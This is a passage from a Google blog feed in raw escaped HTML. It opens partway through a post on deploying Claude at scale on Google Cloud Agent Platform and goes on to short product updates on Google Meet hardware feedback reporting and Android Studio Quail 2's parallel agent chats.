&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimized for cost and performance at scale&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In production, cost and performance drive every architectural decision. Getting both right requires capabilities from two layers: Claude's native model features, and Google Cloud's serving infrastructure. Agent Platform supports both, so teams can optimize across the stack without managing them separately.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Claude-native capabilities, fully supported on Agent Platform&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These features are built into Claude and available on Agent Platform without any additional configuration:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/vertex-ai/generative-ai/docs/partner-models/claude/prompt-caching"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Prompt caching&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; stores and reuses shared prefixes — long system prompts, legal documents, codebases — reducing request latency by up to 80% and cost by up to 90%.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Streaming responses&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; over server-sent events deliver tokens as they are generated, critical for chat interfaces and coding assistants where perceived latency matters.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Extended and&lt;/strong&gt;&lt;a href="https://platform.claude.com/docs/en/build-with-claude/adaptive-thinking" rel="noopener" target="_blank"&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;adaptive thinking&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; lets Claude dynamically determine when and how much to reason through complex, multi-step problems — and allows users to dial the thinking effort directly, for example to control cost. Optimized for use cases like advanced code generation, mathematical reasoning, and multi-document analysis.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Extended context windows up to 1M tokens&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (for Claude Opus 4.6,Sonnet 4.6 and newer models) enable long-document analysis, large codebase reasoning, and multi-turn conversations at depth.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Cloud serving infrastructure&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agent Platform adds its own serving-layer capabilities on top of Claude's native features:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/partner-models/claude/batch"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Batch prediction&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; handles large-scale offline workloads — document classification, content moderation, bulk summarization — asynchronously at lower priority and reduced cost.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/vertex-ai/generative-ai/docs/provisioned-throughput/overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Provisioned throughput&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; reserves dedicated inference capacity for mission-critical workloads, isolating them from public traffic and ensuring predictable performance during peak demand.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Memory management and scheduling&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for long-context requests is handled at the infrastructure layer,.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, these two layers give teams the full range of optimization levers — from model-level efficiency to infrastructure-level capacity control — on a single, unified platform.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;From inference to agents&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The same infrastructure that serves Claude inference powers the agent layer of Agent Platform on Google Cloud. The build-and-register flow has three steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Build with Claude.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Claude is well-suited as an orchestration backbone — its extended context window, native tool use, and adaptive thinking make it effective at planning multi-step tasks and delegating to sub-agents. Pick Claude Opus, Sonnet, or Haiku from the Model Garden, then build with the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/build/adk"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Development Kit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (ADK) — code-first in Python, Go, Java, or TypeScript — deploy to Agent Runtime, Cloud Run or Google Kubernetes Engine.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deploy the Agent to a Runtime. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Depending on your use case, select Agent Runtime, Google Kubernetes Engine or GKE Agent Sandbox to run your deployed agents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Interoperate over A2A.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://developers.googleblog.com/en/a2a-a-new-era-of-agent-interoperability/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent2Agent&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; protocol runs at 150+ organizations, letting a registered Claude-powered agent delegate tasks to agents from SaaS and other service providers.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The result: a planning agent built on Claude can orchestrate sub-tasks across the broader agent ecosystem, under unified IAM, fully auditable, on the same infrastructure that serves the underlying inference.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Start building&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Open the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/model-garden?pageState=(%22galleryStateKey%22:(%22f%22:(%22g%22:%5B%22providers%22%5D,%22o%22:%5B%22ANTHROPIC%22%5D),%22s%22:%22%22))&amp;amp;pli=1"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, enable Claude in the Model Garden, and make your first API call with the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AnthropicVertex&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; SDK. Add prompt caching, provisioned throughput, and other features as your workload demands. When you're ready to go agentic, learn more about&lt;/span&gt; &lt;a href="https://cloud.google.com/products/model-garden/claude?hl=en#learn-more-about-claude-on-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Claude on Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Reach out to your Google Cloud sales representative to discuss bringing Claude into your production environment at scale.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/claude-at-scale-on-google-cloud-frontier-ai-built-for-enterprise-production" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-14T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/search/google-images-25th-anniversary</id>
    <title>Celebrating 25 years of visual search innovation</title>
    <updated>2026-07-14T16:00:00+00:00</updated>
    <content type="html">Google Images logo surrounded by illustrations of people searching for different images</content>
    <link href="https://blog.google/products-and-platforms/products/search/google-images-25th-anniversary" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-14T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/infrastructure-and-cloud/global-network/steel-river-arkansas</id>
    <title>Our largest solar and battery storage project ever</title>
    <updated>2026-07-14T16:00:00+00:00</updated>
    <content type="html">Solar panels, an American flag, and a sign reading "Made in Arkansas"</content>
    <link href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/global-network/steel-river-arkansas" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-14T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/improvement-to-in-room-problem-reporting-for-Google-Meet-hardware.html</id>
    <title>Improvement to in-room problem reporting for Google Meet hardware</title>
    <updated>2026-07-14T15:32:39+00:00</updated>
    <content type="html">&lt;p&gt;Maintaining an enterprise-grade video conferencing environment requires visibility into the health of its devices. We're introducing new ways to see Google Meet hardware user-reported feedback directly in the Admin console.&lt;/p&gt;&lt;p&gt;We’ve also updated user-side feedback options to replace generic reporting with structured actionable feedback making it easier and more intuitive for room participants to report problems.&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;Redesigned user interface&lt;/h4&gt;&lt;p&gt;The new feedback menu on Google Meet hardware now features responses that are tailored to the reporting context (In-Call, Out of Call, Live stream). These new feedback options collect better details, making it easier for admins to understand and troubleshoot the issue.&lt;/p&gt;&lt;p&gt;&lt;b&gt;In-Call Feedback: &lt;/b&gt;Users are presented with call specific options to report a problem , like “Can’t see others” or “Poor audio or video quality.”&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAnyoKB67sWs9AiQZaMMW4IAf77lnEQTiqwFM7uVVhbE-0OFJvqhWdY6ZrmamLa9Wd0V2C6DHYOrCRPc83OhfJC2SqoU7T5ZwaV_b79ca9D_P-JH4ExkUDckOw3wLxb3jxOx6bgT0LV1WPhc3693FzfKGq8gW9GD-HMxlbYs3engB-utC8eAI_a_U0odw/s1264/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%201.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAnyoKB67sWs9AiQZaMMW4IAf77lnEQTiqwFM7uVVhbE-0OFJvqhWdY6ZrmamLa9Wd0V2C6DHYOrCRPc83OhfJC2SqoU7T5ZwaV_b79ca9D_P-JH4ExkUDckOw3wLxb3jxOx6bgT0LV1WPhc3693FzfKGq8gW9GD-HMxlbYs3engB-utC8eAI_a_U0odw/s1600/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%201.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Out-of-Call Feedback: &lt;/b&gt;When filing feedback from the touchscreen landing page, users now see a new set of join-related problems, including “Can’t join Meet call” and “Can’t join Teams call.”&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSXxsyuqYAybS1DgnyUJ0fo8yhrMELs5xkt89164G0s4ShvNiLUr_V-hVvFf76uH1_Aab98JGWsHjc7GIUanp57T3Svjau04fnbdo96tZEzSYiseEJqEr5w1fkJ93_MbFaQSdRIrhvyIjY_xfdRM3kIiS2uFBvQAdEEAGW5dzPRulgjgEYgfUJypmZwOs/s1592/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%202.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSXxsyuqYAybS1DgnyUJ0fo8yhrMELs5xkt89164G0s4ShvNiLUr_V-hVvFf76uH1_Aab98JGWsHjc7GIUanp57T3Svjau04fnbdo96tZEzSYiseEJqEr5w1fkJ93_MbFaQSdRIrhvyIjY_xfdRM3kIiS2uFBvQAdEEAGW5dzPRulgjgEYgfUJypmZwOs/s1600/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%202.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Livestream Feedback: &lt;/b&gt;Users viewing large-scale livestreams will see dedicated options to report a problem.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEhSIQqEEI6vSYXyx6fgfbC3tGhIFHNaHF-5hWdWHyf_lTF_TGXLdbvrpMhyphenhyphenspIQqe0jPvA5Z9ctqShQOg7smQ1n0HvnBYSQFCBJ1bIk7AEj1JOsJt3nfalsYYTHxeEB0wZeQ4my-BJnUHwZ-_AFSiw-kf9EOHvaQB8ChW1iDYVABVRt2v2aLjHLKSGE/s1988/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%203.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEhSIQqEEI6vSYXyx6fgfbC3tGhIFHNaHF-5hWdWHyf_lTF_TGXLdbvrpMhyphenhyphenspIQqe0jPvA5Z9ctqShQOg7smQ1n0HvnBYSQFCBJ1bIk7AEj1JOsJt3nfalsYYTHxeEB0wZeQ4my-BJnUHwZ-_AFSiw-kf9EOHvaQB8ChW1iDYVABVRt2v2aLjHLKSGE/s1600/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%203.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Admin console improvements&lt;/h4&gt;&lt;p&gt;The Google Meet hardware section of the Admin console now features enhanced monitoring tools. Feedback is no longer proxied as a background telemetry event; it is now a primary, sortable “device information” column within the device list.&lt;/p&gt;&lt;p&gt;Enhancements include two new columns on the device list page, including:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Last feedback submitted&lt;/b&gt; - A sortable column displaying the exact timestamp of a device’s most recent report, which can be filtered by 1, 3, 7, or 30 days. Clicking the timestamp opens a side panel containing specific feedback details.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Feedback in the last 28 days&lt;/b&gt; - A cumulative count of reports filed for a specific device over a rolling 28-day period, allowing for the identification of recurring faulty devices.&lt;/li&gt;&lt;/ul&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRqD__WF_U01Kycx4Gc1NTJ5ZrjDdxTbH4NnAQvcKWQHDpYCqGbZUSicIM-J8sCGU8JyHVIFiss54EQ5T7ZXGgrH7aR3kjZMqZzBFgOQYxROmwngh-Y8BwcBSoNihouSeGvKHOaWLK3Olp-q-H0fJbeY-Lb9DQ2YmrXmvXSnH9ZSliLX-c2lHAaVzcWRk/s2048/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%204.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRqD__WF_U01Kycx4Gc1NTJ5ZrjDdxTbH4NnAQvcKWQHDpYCqGbZUSicIM-J8sCGU8JyHVIFiss54EQ5T7ZXGgrH7aR3kjZMqZzBFgOQYxROmwngh-Y8BwcBSoNihouSeGvKHOaWLK3Olp-q-H0fJbeY-Lb9DQ2YmrXmvXSnH9ZSliLX-c2lHAaVzcWRk/s1600/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%204.png" style="border: 2px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;The Google Meet hardware device list featuring new “Last feedback” and “Feedback in last 28 days” columns&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Admins can get more information about a specific “Last feedback” by clicking on the date, a side panel will open providing the specific feedback details:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBK8APy7Y656RlcyR9FCRza32pZ-cOmermheOgXkX-1eXtVsADG9nwSKT3jCeG3_D-vIFVl3ya0u2k9zdNl5B4SNiUjRFA30e0R_oEeEUVhABW0HvJtZcx-Ed8SkQ0Hn5f5Kr5dveVDrY-aweS3leADL70zcTOGTqAAzsOysx9_fslzM0S5_ILqlf9Z5E/s911/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%205.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="627" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBK8APy7Y656RlcyR9FCRza32pZ-cOmermheOgXkX-1eXtVsADG9nwSKT3jCeG3_D-vIFVl3ya0u2k9zdNl5B4SNiUjRFA30e0R_oEeEUVhABW0HvJtZcx-Ed8SkQ0Hn5f5Kr5dveVDrY-aweS3leADL70zcTOGTqAAzsOysx9_fslzM0S5_ILqlf9Z5E/w640-h627/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%205.png" style="border: 2px solid rgb(0, 0, 0);" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;The feedback side panel on the Admin console now shows the new set of problems customers have reported&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;In addition, we’re introducing a new "With feedback in last 7 days" filter, which instantly prioritizes devices with recent reports and repositions the feedback columns to sit next to the device name for immediate visibility.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGri3LB_IuUoRBOgEi5f5S3SWFXwYO58kUgLTf46eZ1BpJTYQLWKhTqJk3tDFGe07Rhid61M6FIVGxXwhuRX-xbk8pNG0xtN3nphXlSCErSStjnI3uyv2HDAXSatOnW5DR5ebWIwI1hVRx_Bp3N-AoUKHv8NvMXoyb_-oAP8pXAkGbKXW4gdYoYg5OAmE/s2014/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%206.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGri3LB_IuUoRBOgEi5f5S3SWFXwYO58kUgLTf46eZ1BpJTYQLWKhTqJk3tDFGe07Rhid61M6FIVGxXwhuRX-xbk8pNG0xtN3nphXlSCErSStjnI3uyv2HDAXSatOnW5DR5ebWIwI1hVRx_Bp3N-AoUKHv8NvMXoyb_-oAP8pXAkGbKXW4gdYoYg5OAmE/s1600/Improvement%20to%20in-room%20problem%20reporting%20for%20Google%20Meet%20hardware%20-%207024%20-%206.png" style="border: 2px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;A new filter to glance at devices with feedback filed in the last 7 days.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; Ensure the “Let users send feedback to Google” checkbox is selected in GMH Settings &amp;gt; Data Sharing &amp;gt; Feedback is ON&amp;nbsp; at the domain or organizational unit (OU) where the device is enrolled. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/get-support-for-google-meet-hardware#Manually_submit_feedback" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Users can report feedback during or after a call or livestream via the “Report a problem” button. Visit the Help Center to &lt;a href="https://support.google.com/meethardware/answer/17164186" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility)&amp;nbsp; starting on July 14, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Google Meet hardware devices&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet Hardware Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/get-support-for-google-meet-hardware" target="_blank"&gt;Get support for Google Meet hardware&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet Hardware Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/view-and-edit-device-information" target="_blank"&gt;View &amp;amp; edit device information&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet Hardware Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/monitor-the-health-of-devices" target="_blank"&gt;Monitor the health of devices&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet Hardware Help: &lt;a href="https://support.google.com/meethardware/answer/17164186" target="_blank"&gt;How to report a problem from a meeting room device&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/improvement-to-in-room-problem-reporting-for-Google-Meet-hardware.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-14T15:32:39+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/google-deepmind/reconstructing-peles-lost-goal</id>
    <title>Reconstructing Pelé’s “lost” goal</title>
    <updated>2026-07-14T13:00:00+00:00</updated>
    <content type="html">Pele documentary</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/google-deepmind/reconstructing-peles-lost-goal" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-14T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/06/android-studio-quail-2-stable-features.html</id>
    <title>Android Studio Quail 2 is Stable: Multi-task with the Android Studio AI agent</title>
    <updated>2026-07-14T11:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitwUFdkGaqVNsaJ2iCtprD4WZuFjvI1rR6WX35ewxin0wbtVadUtkRb3qYG-KGEKepmtC4WFv2mSAmUBRmZ-oR5ey_-codg1_MhbagflhqgWk2MdNX6-yL8SaADve6mn3v0aJ_uh-qLizIgdImHaQ_KdJfVYqvCga_v_fyJYPHKDyhuhVklAfo145xays/s2461/QuailBlog_Meta.png" style="display: none;" /&gt;&lt;p&gt;Posted by Amman Asfaw, Product Manager, Android Studio&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-nTZM4cgutSVcLIdjSDqJoeiaES_FELwFC84O01Roy0P81-mAyqz3X2w4pwzAZwdhiMeUuhRSyT4euWZkWtGderw6LRu-fK6k-w8lB-9k7GMXOFBy0IzgtGmUk6QkRriFX24lchlTD0SQhbywxli4p4iZ7JzMAN80YoCdruEeruJ58bwhmuo0cj9Y_yg/s2152/QuailMovement_V1_a.gif" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-nTZM4cgutSVcLIdjSDqJoeiaES_FELwFC84O01Roy0P81-mAyqz3X2w4pwzAZwdhiMeUuhRSyT4euWZkWtGderw6LRu-fK6k-w8lB-9k7GMXOFBy0IzgtGmUk6QkRriFX24lchlTD0SQhbywxli4p4iZ7JzMAN80YoCdruEeruJ58bwhmuo0cj9Y_yg/s1600/QuailMovement_V1_a.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Android Studio Quail 2 is now stable and ready for you to use in production, bringing a shift to your IDE with concurrent agentic workflows, natively integrated memory leak profiling, and context-aware crash remediation. Whether you are performing a sweeping architectural overhaul, tracing a memory leak, or resolving a critical production crash, Android Studio keeps you anchored in your workspace by reducing manual friction.&lt;/p&gt;
&lt;p style="margin-bottom: 12px;"&gt;Here’s a deep dive into what’s new:&lt;/p&gt;
&lt;h2 style="margin-top: 0px;"&gt;Multi-tasking with parallel chats&lt;/h2&gt;

&lt;p&gt;In Android Studio Quail 2, we've been hard at work redesigning Agent Mode from the ground up. This new architecture provides better performance, offers more flexibility for decomposing complex tasks, and improves the suite of internal tools the agent uses to do its work.&lt;/p&gt;In addition to these behind-the-scenes improvements, these changes also allow you to converse across multiple agent chats simultaneously. Waiting for the Android Studio agent to finish a task before you can ask another question or initiate a separate task in Agent Mode is a bottleneck of the past. You can multi-task seamlessly: kick off a UI refactor in one tab, fix a ProGuard rule in a second, and generate documentation in a third.&lt;br /&gt;&lt;br /&gt; You can also change which models the agent uses from chat to chat based on the requests you have. Take a look at &lt;a href="http://d.android.com/bench"&gt;Android Bench&lt;/a&gt; for an analysis of how LLMs perform Android development tasks. 

&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;strong&gt;How to use:&lt;/strong&gt; Click the "+" icon to start a new parallel conversation, and use the &lt;b&gt;History&lt;/b&gt; icon to navigate between active tasks. Alternatively, select File &amp;gt; New &amp;gt; New Agent Tab to open a conversation in a dedicated tab.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Note:&lt;/strong&gt; Worktree support is currently unavailable. Exercise caution when running concurrent chats that modify the same project files, which can potentially lead to editor conflicts.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
  
&lt;/div&gt;

